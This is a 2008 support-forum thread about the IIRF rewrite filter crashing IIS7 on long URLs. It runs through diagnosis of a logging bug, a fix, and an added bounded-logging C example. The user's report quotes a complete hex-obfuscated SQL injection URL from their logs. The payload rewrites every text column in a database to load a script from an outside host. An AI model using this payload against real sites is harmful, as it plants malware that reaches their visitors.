%{QUERY_STRING} as RewriteCond crashes with long URLs

Jun 11, 2008 at 3:50 PM
We've got SQL injection attempts with very long URLs like these:

/sk/page.asp?lang=d&main=1&subs=0&did=1700;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62696761646E65742E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

Combined with this rule:

    RewriteCond %{QUERY_STRING} var_bereich
    RewriteRule .* /index.asp [R]

the site pool crashes. It restarts under a new process id.

I already tried the new 1.2.14b version. Our system is IIS7 under W2008.
Coordinator
Jun 11, 2008 at 7:18 PM

Got it.

I just duplicated this behavior.  Let me look into it.

Coordinator
Jun 11, 2008 at 8:39 PM
In this case, the crash is being caused by logging logic.
One workaround, then, is to turn off the logging, or turn it down to below 3.

I've opened a workitem for this.
http://www.codeplex.com/IIRF/WorkItem/View.aspx?WorkItemId=17002

It is fixed in change set 33905.

This fix will be in the next build of 1.2.14b preview.
Jun 12, 2008 at 6:58 AM
But I also get the error setting the log level to 0.
Coordinator
Jun 12, 2008 at 1:43 PM
Hmmm, sorry about that. Yes, of course. The error occurs during formatting of log messages. The log level setting only affects whether the messages get displayed.

So, no workaround for the problem with long URLs.

Try the latest binary.
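
An added example, not part of the original thread and not IIRF's code or the fix in change set 33905: a logger that checks the level before it formats anything and bounds the formatting with `vsnprintf`, so a query string of any length is either skipped or truncated. The buffer size, function names, message text and level semantics are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF 256              /* assumed buffer size, not taken from IIRF */

static int  g_log_level = 0;     /* 0 = logging off (assumed semantics) */
static char g_last[LOG_BUF];     /* stands in for the log file */

/* Returns 0 = skipped, 1 = written whole, 2 = written truncated. */
int log_msg(int level, const char *fmt, ...)
{
    va_list ap;
    int n;

    if (level > g_log_level)     /* gate BEFORE formatting, not after */
        return 0;

    va_start(ap, fmt);
    n = vsnprintf(g_last, sizeof g_last, fmt, ap);  /* never writes past g_last */
    va_end(ap);

    if (n < 0) { g_last[0] = '\0'; return 0; }
    if ((size_t)n >= sizeof g_last) {
        /* Output was cut short: mark it so the log reader can tell. */
        memcpy(g_last + sizeof g_last - 4, "...", 4);
        return 2;
    }
    return 1;
}

size_t last_len(void) { return strlen(g_last); }

/* Constructed input: a query string of qs_len 'A' bytes (no real payload). */
int demo(int configured_level, size_t qs_len)
{
    static char qs[8192];
    if (qs_len >= sizeof qs) qs_len = sizeof qs - 1;
    memset(qs, 'A', qs_len);
    qs[qs_len] = '\0';
    g_log_level = configured_level;
    g_last[0] = '\0';
    return log_msg(3, "RewriteCond: QUERY_STRING '%s'", qs);
}

int main(void)
{
    printf("level 0, 4000 bytes -> %d\n", demo(0, 4000));
    printf("level 3, 4000 bytes -> %d (%zu bytes kept)\n", demo(3, 4000), last_len());
    return 0;
}
```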
Jun 13, 2008 at 4:52 PM
Thanks a lot, seems to work ...
Coordinator
Jun 19, 2008 at 5:12 AM
PS: don't forget, IIRF is now donationware.
I am now accepting donations on behalf of my favorite charity.
If you find IIRF useful, consider donating.